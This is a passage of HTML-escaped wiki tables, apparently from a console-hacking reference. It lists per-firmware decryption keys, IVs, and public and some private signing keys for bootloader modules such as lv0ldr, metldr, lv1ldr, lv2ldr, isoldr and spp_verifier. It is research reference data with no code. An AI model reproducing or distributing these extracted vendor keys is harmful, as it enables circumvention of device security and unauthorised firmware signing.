the obfuscated key as seen directly inside the decrypted loader keytable<br /> <br /> ===Lv0Ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-key for decrypting<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv0ldr&lt;br /&gt;(Internal) || - ({{SD}}) || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-&lt;!--// key for decrypting lv0, inside lv0ldr //--&gt;<br /> | lv0ldr || 0.60+ || &lt;code&gt;CA7A24EC38BDB45B98CCD7D363EA2AF0C326E65081E0630CB9AB2D215865878A&lt;/code&gt; || &lt;code&gt;F9205F46F6021697E670F13DFA726212&lt;/code&gt; || &lt;code&gt;A8FD6DB24532D094EFA08CB41C9A72287D905C6B27B42BE4AB925AAF4AFFF34D41EEB54DD128700D&lt;/code&gt; || &lt;code&gt;001AD976FCDE86F5B8FF3E63EF3A7F94E861975BA3&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> |-&lt;!--// key for decrypting lv0, inside lv0ldr //--&gt;<br /> | lv0ldr || 030.001-050.013 ({{CEB}}) || &lt;code&gt;B9F3F9E6107CFF2680A91E118C2403CF4A6F18F3C7EFD7D13D1AC4DB760BD222&lt;/code&gt; || &lt;code&gt;B43661B9A79BAD9D8E2B046469CDA1E7&lt;/code&gt; || &lt;code&gt;4C870BE86DDD996A92A3F7F404F33604244A1D02AB5B78BC9DAF030B78BE8867CF586171B7D45D20&lt;/code&gt; || &lt;code&gt;002CC736C7AD06D264E9AB663EB1F35F5DC159248C&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===MetLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | metldr&lt;br /&gt;(Internal) || - ({{SD}}) || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | metldr || - || &lt;code&gt;C0CEFE84C227F75BD07A7EB846509F93B238E770DACB9FF4A388F812482BE21B&lt;/code&gt; || &lt;code&gt;47EE7454E4774CC9B8960C7B59F4C14D&lt;/code&gt; || &lt;code&gt;C2D4AAF319355019AF99D44E2B58CA29252C89123D11D6218F40B138CAB29B7101F3AEB72A975019&lt;/code&gt; || &lt;code&gt;00C5B2BFA1A413DD16F26D31C0F2ED4720DCFB0670&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Lv1ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv1ldr&lt;br /&gt;(Internal) || {{SD}} 0.80 || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | lv1ldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573&lt;/code&gt; || &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv1ldr || 030.001-3.31 || &lt;code&gt;B9F3F9E6107CFF2680A91E118C2403CF4A6F18F3C7EFD7D13D1AC4DB760BD222&lt;/code&gt; || &lt;code&gt;B43661B9A79BAD9D8E2B046469CDA1E7&lt;/code&gt; || &lt;code&gt;4C870BE86DDD996A92A3F7F404F33604244A1D02AB5B78BC9DAF030B78BE8867CF586171B7D45D20&lt;/code&gt; || &lt;code&gt;002CC736C7AD06D264E9AB663EB1F35F5DC159248C&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.40-3.42 || &lt;code&gt;B880593856C8C6D2037585626A12977F50DCFCF3F132D2C89AA6E670EAFC1646&lt;/code&gt; || &lt;code&gt;A79B05D4E37B8117A95E6E7C14FB640E&lt;/code&gt; || &lt;code&gt;7454C7CCBFC2F66C142D78A730A3A6F973CC0FB75A46FCBB390790138910A0CAC78E5E21F4DA3375&lt;/code&gt; || &lt;code&gt;00033A699FDD2DA6CDD6CCC03B2C6145F998706F74&lt;/code&gt; || &lt;code&gt;0x34&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.50 || &lt;code&gt;1E8EEEA9E80A729F3FA52CF523B25941EA44B4155D94E5DADC5C5A77847620C7&lt;/code&gt; || &lt;code&gt;E034D31A80316960024D1B3D3164FDC3&lt;/code&gt; || &lt;code&gt;7E3A196f4A5879F3A7B091A2263F7C24E1716129B580566D308D9C2254B36AEE53DEF30EC85F8398&lt;/code&gt; || &lt;code&gt;005815D17125D04C33790321DE29EB6241365100B5&lt;/code&gt; || &lt;code&gt;0x35&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.55 || &lt;code&gt;53ABDF84BE08B0351B734F2B97D2BE1621BC6C889E4362E5C70F39D6C3ED9F23&lt;/code&gt; || &lt;code&gt;44E652661AC7584DBE08ECB810FB5FC0&lt;/code&gt; || &lt;code&gt;733198A7759BC07326755BC9773A8A17C8A7043C7BDAB83D88E230512E2EA3852D7DA4263A7E97F9&lt;/code&gt; || &lt;code&gt;004312C65347ACBE95CC306442FEFD0AF4C2935EB3&lt;/code&gt; || &lt;code&gt;0x05&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.56 || &lt;code&gt;48793EBDDA1AF65D737DA2FDA2DD104447A698F8A82CAAEE992831711BA94E83&lt;/code&gt; || &lt;code&gt;15DCF3C67147A45D09DE7521EECA07A1&lt;/code&gt; || &lt;code&gt;85A8868C320127F10B6598964C69221C086702021D31803520E21FDE4DBE827766BE41825CB7328C&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60-3.61 || &lt;code&gt;5FF17D836E2C4AD69476E2614F64BDD05B9115389A9A6D055B5B544B1C34E3D5&lt;/code&gt; || &lt;code&gt;DF0F50EC3C4743C5B17839D7B49F24A4&lt;/code&gt; || &lt;code&gt;1CDABE30833823F461CA534104115FFF60010B710631E435A7D915E82AE88EDE667264656CB7062E&lt;/code&gt; || - || &lt;code&gt;0x05&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.65-3.66 || &lt;code&gt;BD0621FA19383C3C72ECBC3B008F1CD55FFD7C3BB7510BF11AD0CF0FC2B70951&lt;/code&gt; || &lt;code&gt;569AF3745E1E02E3E288273CDE244CD8&lt;/code&gt; || &lt;code&gt;21E26F11C2D69478609DD1BD278CDFC940D90386455BA52FCD1FA7E27AC2AFA826C79A10193B625C&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.70-3.74 || &lt;code&gt;41A6E0039041E9D8AAF4EF2F2A2971248EDBD96A3985611ED7B4CE73EE4804FE&lt;/code&gt; || &lt;code&gt;C8C98D5A5CE23AF5607A352AECACB0DC&lt;/code&gt; || &lt;code&gt;4389664390265F96C1A882374C0F856364E33DB09BE124A4666F9A12F0DD9C811EDD55BA21ED0667&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.00-4.11 || &lt;code&gt;557EDF6C063F3272B0D44EEC12F418DA774815B5415597CC5F75C21E048BAD74&lt;/code&gt; || &lt;code&gt;7144D7574937818517826227EF4AC0B4&lt;/code&gt; || &lt;code&gt;085D38DBF9B757329EB862107929909D32FA1DAE60641BF4AC25319D7650597EE977F8E810FEEA96&lt;/code&gt; || - || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.20-{{latest}} || &lt;code&gt;10CEA04973FCCC12EC19924510822D8D4C41F657FD3D7E73F415A8D687421BCD&lt;/code&gt; || &lt;code&gt;ED8699562C6AC65204FA166257E7FCF4&lt;/code&gt; || &lt;code&gt;9AF86FC869C159FBB62F7D9674EE257ABF12E5A96D5875B4AA73C13C2BC13E2A4079F98B9B935EE2&lt;/code&gt; || - || &lt;code&gt;0x14&lt;/code&gt;<br /> |}<br /> <br /> ===Lv2Ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv2ldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573&lt;/code&gt; || &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv2ldr || 030.001-3.31 || &lt;code&gt;94303F69513572AB5AE17C8C2A1839D2C24C28F65389D3BBB11894CE23E0798F&lt;/code&gt; || &lt;code&gt;9769BFD187B90990AE5FEA4E110B9CF5&lt;/code&gt; || &lt;code&gt;AFAF5E96AF396CBB69071082C46A8F34A030E8EDB799E0A7BE00AA264DFF3AEBF7923920D559404D&lt;/code&gt; || &lt;code&gt;0070ABF9361B02291829D479F56AB248203CD3EB46&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.40-3.42 || &lt;code&gt;575B0A6C4B4F2760A03FE4189EBAF4D947279FD982B14070349098B08FF92C10&lt;/code&gt; || &lt;code&gt;411CB18F460CE50CAF2C426D8F0D93C8&lt;/code&gt; || &lt;code&gt;3FEE313954CB3039C321A7E33B97FFDEC8988A8B55759161B04DBF4731284E4A8191E3F17D32B0EA&lt;/code&gt; || &lt;code&gt;0073076441A08CD179E5FACE349B86DA58B5B7BA78&lt;/code&gt; || &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.50 || &lt;code&gt;6DBD48D787C58803A8D724DA5ACF04FF8FCE91D7545D2322F2B7ABF57014AF68&lt;/code&gt; || &lt;code&gt;603A36213708520ED5D745DEC1325BA5&lt;/code&gt; || &lt;code&gt;5888CB83AC3CCA9610BC173C53141C0CA58B93719E744660CA8823D5EAEE8F9BF736997054E4B7E3&lt;/code&gt; || &lt;code&gt;0009EBC3DE442FA5FBF6C4F3D4F9EAB07778A142BD&lt;/code&gt; || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.55 || &lt;code&gt;84015E90FA23139628A3C75CC09714E6427B527A82D18ABC3E91CD8D7DDAFF17&lt;/code&gt; || &lt;code&gt;5B240444D645F2038118F97FD5A145D5&lt;/code&gt; || &lt;code&gt;B266318245266B2D33641CD8A864066D077FAC60B7E27399099A70A683454B70F9888E7CC0C2BF72&lt;/code&gt; || &lt;code&gt;009D4CBA2BFB1A8330D3E20E59D281D476D231C73A&lt;/code&gt; || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.56 || &lt;code&gt;EAE15444048EFDE7A831BFA9F5D96F047C9FCFF50723E292CF50F5417D81E359&lt;/code&gt; || &lt;code&gt;9CA9282DC7FA9F315EF3156D970B7CD4&lt;/code&gt; || &lt;code&gt;0D58938CB47598A6A672874F1768068F8B80D8D17014D2ABEBAC85E5B0993D9FB6F307DDC3DDA699&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60-3.61 || &lt;code&gt;88AD367EDEC2FEED3E2F99B1C685075C41BDEC90C84F526CAF588F89BBD1CBCC&lt;/code&gt; || &lt;code&gt;8D18E8E525230E63DE10291C9DD615BF&lt;/code&gt; || &lt;code&gt;86EED1D65E58890ABDA9ACA486A2BDDB9C0A529C2053FAE301F0F698EAF443DA0F60595A597A7027&lt;/code&gt; || - || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65-3.66 || &lt;code&gt;688D5FCAC6F4EA35AC6AC79B10506007286131EE038116DB8AA2C0B0340D9FB0&lt;/code&gt; || &lt;code&gt;75E0239D18B0B669EAE650972F99726B&lt;/code&gt; || &lt;code&gt;008E1C820AC567D1BFB8FE3CC6AD2E1845A1D1B19ED2E18B18CA34A8D28A83EC60C63859CDB3DACA&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70-3.74 || &lt;code&gt;E81C5B04C29FB079A4A2687A39D4EA97BFB49D80EF546CEB292979A5F77A6254&lt;/code&gt; || &lt;code&gt;15058FA7F2CAD7C528B5F605F6444EB0&lt;/code&gt; || &lt;code&gt;438D0E5C1E7AFB18234DB6867472FF5F52B750F30C379C7DD1EE0FD23E417B3EA819CC01BAC480ED&lt;/code&gt; || - || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.00-4.11 || &lt;code&gt;A1E4B86ED02BF7F1372A2C73FE02BC738907EB37CE3BA605FE783C999FAFDB97&lt;/code&gt; || &lt;code&gt;BBE7799B9A37CB272E386618FDFD4AEC&lt;/code&gt; || &lt;code&gt;5B31A8E2A663EBD673196E2E1022E0D64988C4E1BBFE5E474415883A3BA0D9C562A2BE9C30E9B4A8&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.20-{{latest}} || &lt;code&gt;0CAF212B6FA53C0DA7E2C575ADF61DBE68F34A33433B1B891ABF5C4251406A03&lt;/code&gt; || &lt;code&gt;9B79374722AD888EB6A35A2DF25A8B3E&lt;/code&gt; || &lt;code&gt;1034A6F98AF6625CC3E3604B59B971CA617DF337538D2179EBB22F3BDC9D0C6DA56BA7DDFD205A50&lt;/code&gt; || - || &lt;code&gt;0x14&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===IsoLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! Revision !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | isoldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || 0x01 ||&lt;code&gt;9E85BEE6D39E9632A77FE3CD6E647C8DFE4606C383E1697DD6D9CE63341EAFF9&lt;/code&gt; || &lt;code&gt;2C1F4C82FF3A796D3A772CEEF010ECA4&lt;/code&gt; || &lt;code&gt;625D1DF4C3264BBA9FC17A4437BA42591585A5ECCC6F3042DB3A80CBBC0426DAF33549C537AA7782&lt;/code&gt; || &lt;code&gt;00D19A1B338041F7C31062B9C40E725E1DA5D7C11A&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> | isoldr || 0.80-3.31 || 0x01 || &lt;code&gt;8860D0CFF4D0DC688D3223321B96B59A777E6914961488E07048DAECB020ECA4&lt;/code&gt; || &lt;code&gt;C82D015D46CF152F1DD0C16F18B5B1E5&lt;/code&gt; || &lt;code&gt;733918D7C888130509346E6B4A8B6CAA357AB557E814E8122BF102C14A314BF9475B9D70EAF9EC29&lt;/code&gt; || &lt;code&gt;009BE892E122A5C943C1BB7403A67318AA9E1B286F&lt;/code&gt; || &lt;code&gt;0x36&lt;/code&gt;<br /> |-<br /> | isoldr || 3.40-3.42 || 0x01 || &lt;code&gt;101E27F3FA2FB53ACA924F783AD553162D56B975D05B81351A1111799F20254D&lt;/code&gt; || &lt;code&gt;8D2E9C6297B8AD252998458296AC773C&lt;/code&gt; || &lt;code&gt;138446EE0BDDA5638F97328C8956E6489CBBFE57C5961D40DD5C43BB4138F1C400A8B27204A5D625&lt;/code&gt; || &lt;code&gt;00849DBC57D3B92F01864E6E82EB4EF0EF6311E122&lt;/code&gt; || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | isoldr || 3.50 || 0x01 || &lt;code&gt;3F2604FA27AEADFBE1AC69EB00BB16EF196C2193CBD62900FFD8C25041680843&lt;/code&gt; || &lt;code&gt;A414AC1DB7987E43777651B330B899E1&lt;/code&gt; || &lt;code&gt;1F4633AFDE18614D6CEF38A2FD6C4CCAC7B6EB8109D72CD066ECEBA0193EA3F43C37AE83179A4E5F&lt;/code&gt; || &lt;code&gt;0085B4B05DEBA7E6AD831653C974D95149803BB272&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | isoldr || 3.55 || 0x01 || &lt;code&gt;BDB74AA6E3BA2DC10B1BD7F17198399A158DBE1FA0BEA68C90FCACBE4D04BE37&lt;/code&gt; || &lt;code&gt;0207A479B1574F8E7F697528F05D5435&lt;/code&gt; || &lt;code&gt;917E1F1DC48A54EB5F10B38E7569BB5383628A7C906F0DCA62FDA33805C15FAB270016940A09DB58&lt;/code&gt; || &lt;code&gt;00294411363290975BA551336D3965D88AF029A17B&lt;/code&gt; || &lt;code&gt;0x03&lt;/code&gt;<br /> |-<br /> | isoldr || 3.56 || 0x01 || &lt;code&gt;311C015F169F2A1E0757F7064B14C7C9F3A3FFEE015BD4E3A22401A2667857CE&lt;/code&gt; || &lt;code&gt;7BB8B3F5AC8E0890E3148AE5688C7350&lt;/code&gt; || &lt;code&gt;3F040EFA2335FED5670BA4D5C3AB2D9D0B4BA69D154A0062EA995A7D21DBAF0DC5A0DAD333D1C1DD&lt;/code&gt; || - || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | isoldr || 3.60-3.61 || 0x01 || &lt;code&gt;8474ADCA3B3244931EECEB9357841442442A1C4A4BCF4E498E6738950F4E4093&lt;/code&gt; || &lt;code&gt;FFF9CACCC4129125CAFB240F419E5F39&lt;/code&gt; || &lt;code&gt;098E1A53E59A95316B00D5A29C05FFEBAE41D1A8A386F9DA96F98858FD25E07BB7A3BC96A5D5B556&lt;/code&gt; || - || &lt;code&gt;0x03&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65-3.66 || 0x01 || &lt;code&gt;E6A21C599B75696C169EC02582BDA74A776134A6E05108EA701EC0CA2AC03592&lt;/code&gt; || &lt;code&gt;D292A7BD57C0BB2EABBCA1252FA9EDEF&lt;/code&gt; || &lt;code&gt;2ED078A13DC4617EB550AD06E228C83C142A2D588EB5E729402D18038A14842FD65B277DCAD225A5&lt;/code&gt; || - || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70-3.74 || 0x01 || &lt;code&gt;072D3A5C3BDB0D674DE209381432B20414BC9BDA0F583ECB94BD9A134176DD51&lt;/code&gt; || &lt;code&gt;8516A81F02CF938740498A406C880871&lt;/code&gt; || &lt;code&gt;5A778DEB5C4F12E8D48E06A2BBBBE3C90FA8C6C47DF9BDB5697FD4A8EB7941CE3F59A557E81C787D&lt;/code&gt; || - || &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70-3.74 || 0x0100 || &lt;code&gt;786FAB8A0B89474A2CB80B3EA104CCCB9E13F66B45EC499BB31865D07C661EA8&lt;/code&gt; || &lt;code&gt;94662F13D99A9F5D211C979FFDF65FE3&lt;/code&gt; || &lt;code&gt;912C94C252B7799CEB45DFBB73EF7CAD9BCC0793A3331BBB79E3C47C0F5C782F698065A8D4DB0D8B&lt;/code&gt; || - || &lt;code&gt;0x0E&lt;/code&gt;<br /> |-<br /> | isoldr || 4.00-4.11 || 0x01 || &lt;code&gt;4262657A3185D9480F82C8BD2F81766FCC2C8FD7DD5EBE8657B00B939E0C75BD&lt;/code&gt; || &lt;code&gt;4F1E3EF07D893A4714B1B3D5A4E50479&lt;/code&gt; || &lt;code&gt;4DBFCFA68B52F1D66E09AFA6C18EC65479EDBD027B6B8C6A5D85FE5C84D43EA40CEF1672078A0702&lt;/code&gt; || - || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | isoldr || 4.00-4.11 || 0x0100 || &lt;code&gt;16AA7D7C35399E2B1BFAF68CD19D7512A7855029C08BECC4CC3F035DF7F9C70B&lt;/code&gt; || &lt;code&gt;0E50DB6D937D262CB0499136852FCB80&lt;/code&gt; || &lt;code&gt;AEE2795BF295662A50DFAFE70D1B0B6F0A2EBB211E1323A275FC6E2D13BE4F2F10CA34784F4CF1EC&lt;/code&gt; || - || &lt;code&gt;0x0F&lt;/code&gt;<br /> |-<br /> | isoldr || 4.20-{{latest}} || 0x01 || &lt;code&gt;63565DBE98C3B1A52AADC907C47130FE57A10734E84F22592670F86ED2B0A086&lt;/code&gt; || &lt;code&gt;953F6A99891B4739358F5363A00C08B9&lt;/code&gt; || &lt;code&gt;26BE7B02E7D65C6C21BF4063CDB8C0092FE1679D62FA1A8CCC284A1D21885473A959992537A06612&lt;/code&gt; || - || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | isoldr || 4.20-{{latest}} || 0x0100 || &lt;code&gt;B96EA32CB96EA32DB96EA32CB96EA32CB96EA32CB96EA32DB96EA32CB96EA32C&lt;/code&gt; || &lt;code&gt;B96EA32CB96EA32DB96EA32DB96EA32C&lt;/code&gt; || &lt;code&gt;2D7066E68C6AC3373B1346FD76FE7D18A207C811500E65D85DB57BC4A27AD78F59FD53F38F50E151&lt;/code&gt; || - || &lt;code&gt;0x02&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Spp verifier===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | spp_verifier&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | spp_verifier || 0.80-3.55 || &lt;code&gt;56C655747A4B6957A2D8BB9AC605C297E6AC9871932BFECDDE066CEE5B29470A&lt;/code&gt; || &lt;code&gt;007E6B268EF1E986D10A9889CF93A8CB&lt;/code&gt; || &lt;code&gt;265C04E7F20C3B8ACAC90E7C9D12757ED7ACBC01AA6624A2A927E719A4AA1222F87D917005F6072A&lt;/code&gt; || &lt;code&gt;0001608EF3BACAFFB8C3A5958A24F758325B62B08C&lt;/code&gt; || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.56 || &lt;code&gt;7FD222B3FEF467DF7E3F63AC8B77501A3B38752411E96AFEDA6587B5CD5E91B0&lt;/code&gt; || &lt;code&gt;B889290922B002F57086B818A8FDE3CC&lt;/code&gt; || &lt;code&gt;71E12CB3D81AFA79670AF4FAC4BBE41AA7F7DDF368F5615E933CB1C21A783B73C085CA49986CCF63&lt;/code&gt; || - || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.60-3.61 || &lt;code&gt;ED17248214B9AB34D57ED5CA6CCAEC9879137B4B46CE5064E6491D34001BACF2&lt;/code&gt; || &lt;code&gt;3E05572881C5BC845D310EAC28497B08&lt;/code&gt; || &lt;code&gt;504F905A8AAAA0E9BF55F6D5285697E2CABDB1A5240C4745BE8923308169EAB43E1BFD265F5E579E&lt;/code&gt; || - || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.65-3.66 || &lt;code&gt;E750FE8ED144D99782AC605944350B9F41AE489C3274C42C1BFD5AB06115C7C4&lt;/code&gt; || &lt;code&gt;0F23BBED0473B4899AD793AC76D8F722&lt;/code&gt; || &lt;code&gt;934861FF0D4BAF7141B658D1D84441D413060D7E534E99E357B5090EECFB34D947694ADB9F6E7D3F&lt;/code&gt; || - || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.70-3.74 || &lt;code&gt;4B1A459AF1D484DABD727BD316351A9A1B3404E9B1DE925B95527166DB3BB2D0&lt;/code&gt; || &lt;code&gt;3B6203C2730D283F978A12D5390DD747&lt;/code&gt; || &lt;code&gt;0AEEB187EA76913765A15A435F2F1B15545F60794FB5244DC54801B6BABD497565ED6BF57C1A80C8&lt;/code&gt; || - || &lt;code&gt;0x23&lt;/code&gt;<br /> |-<br /> | spp_verifier || 4.00-4.11 || &lt;code&gt;11FA6344E869787209E6806E66A7799F7128BD98AEAE95B386D4C88EDDDB3FEF&lt;/code&gt; || &lt;code&gt;67B49380C74FFB15AD929E8C819586AD&lt;/code&gt; || &lt;code&gt;5E028AC83D1BF838CEC43CA11969C72533A057BB0C3CB4A571F8E08DD5DF793CD1E1270CA6E89FB3&lt;/code&gt; || - || &lt;code&gt;0x04&lt;/code&gt;<br /> |-<br /> | spp_verifier || 4.20-{{latest}} || &lt;code&gt;D2961BBFFEDAEE269B061454D6ACF262CD71BC6F5320180F0A04A07583CCF7C5&lt;/code&gt; || &lt;code&gt;6D308B59BC9054B12C833359D31BAE77&lt;/code&gt; || &lt;code&gt;0CDD0D1541A6B0DFD12E951578536CA60C93853B88FCE17592DC8D134B08A94AF8BB08667E2D70A5&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===RvkLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | rvklist&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | rvklist || 030.001-3.55 || &lt;code&gt;03AF06FD1CE6DA366361682CDF59F9708B5D7876F40A9E1E9AC2B22F51B60BDF&lt;/code&gt; || &lt;code&gt;8B5D7876F40A9E1E9AC2B22F51B60BDF&lt;/code&gt; || &lt;code&gt;9ADE7830EB74245EC357CE4F6401633E5A8048FD865F9D8F1A9189535A37623E2921427463A754F7&lt;/code&gt; || &lt;code&gt;00245E673B039D656DA206BDAE4EAEFCBF2A8D5EAF&lt;/code&gt; || &lt;code&gt;0x29&lt;/code&gt;<br /> |-<br /> | rvklist || 3.56 || &lt;code&gt;22628A9EC4C414D5B32F2B4BA4926089DE9A461B190FB3E4392D057C525535DE&lt;/code&gt; || &lt;code&gt;D5D4B8ED62B6CCA0249A79776E136975&lt;/code&gt; || &lt;code&gt;51751B9F1DA58638D2D99F67E20A1D4A454C5B042CD1D0A449A2989808002BA68FB5B7F4B5B4E63B&lt;/code&gt; || - || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | rvklist || 3.60-3.61 || &lt;code&gt;BCFEDBE01D445CDEF335C543703D8E9C1199FAC33DC4595D7382EAF54EF9C4C3&lt;/code&gt; || &lt;code&gt;B20A23079516205525683D8058379CBF&lt;/code&gt; || &lt;code&gt;9859B677A5B8FCCA31A6FBA2E3220EE5E207343A58EEEE6B6CB260EB5E971352C45428E8C8398BE6&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | rvklist || 3.65-3.66 || &lt;code&gt;1EBD693BD813ADDA2203DAEE0441F4146C174F68F532B3E43A48F029230EF70C&lt;/code&gt; || &lt;code&gt;501819323BFCF9FB99396B46B70A97E7&lt;/code&gt; || &lt;code&gt;6563EA3D5694A913F24059A57B2A3645C7C8A587CF20075EFD978A048CAD7A68A8EB7E6BC4BC5448&lt;/code&gt; || - || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | rvklist || 3.70-3.74 || &lt;code&gt;4AF39F7A4E214ECB270416EDD17113A23DC5AD2EDAA5FC91817EE171CDB8B9F4&lt;/code&gt; || &lt;code&gt;0E5CB28FA2666E3ED45289DABC67DDC2&lt;/code&gt; || &lt;code&gt;758BBF611ED6BB8C32D2A49A7AD456D585D11C74926F977737EE309F213D971404A8F9022B409371&lt;/code&gt; || - || 